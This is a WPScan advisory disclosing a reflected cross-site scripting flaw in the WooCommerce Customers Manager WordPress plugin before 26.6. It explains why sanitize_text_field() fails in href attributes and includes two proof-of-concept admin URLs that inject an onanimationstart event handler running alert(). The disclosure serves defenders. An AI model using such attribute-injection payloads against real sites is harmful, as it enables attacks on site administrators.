WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Woocommerce Customers Manager < 26.6 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The wccm_customers_ids and wccm_customers_emails parameters are output in href attributes, after being sanitised with the sanitize_text_field() function, which is not appropriate for such case, as payload such as ' injected-attribute=value will still be injected. This lead to a reflected XSS issue in the administrator dashboard when opening a malicious URL

Proof of Concept

https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-guests-list&wccm_customers_ids=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-ids%2F%29+b%3D%27

https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-guests-list&wccm_customers_emails=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-emails%2F%29+b%3D%27

Affects Plugins

woocommerce-customers-manager
Fixed in version 26.6

References

URL
https://codecanyon.net/item/woocommerce-customers-manager/10965432
URL
https://blog.wpscan.com/2021/04/08/woocommerce-customers-manager-wordpress-security-vulnerabilities.html

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
ad9dd88c-7ae8-41ac-a0d7-469e146f7817

Timeline

Publicly Published

2021-03-30 (about 1 years ago)

Added

2021-03-30 (about 1 years ago)

Last Updated

2021-04-09 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin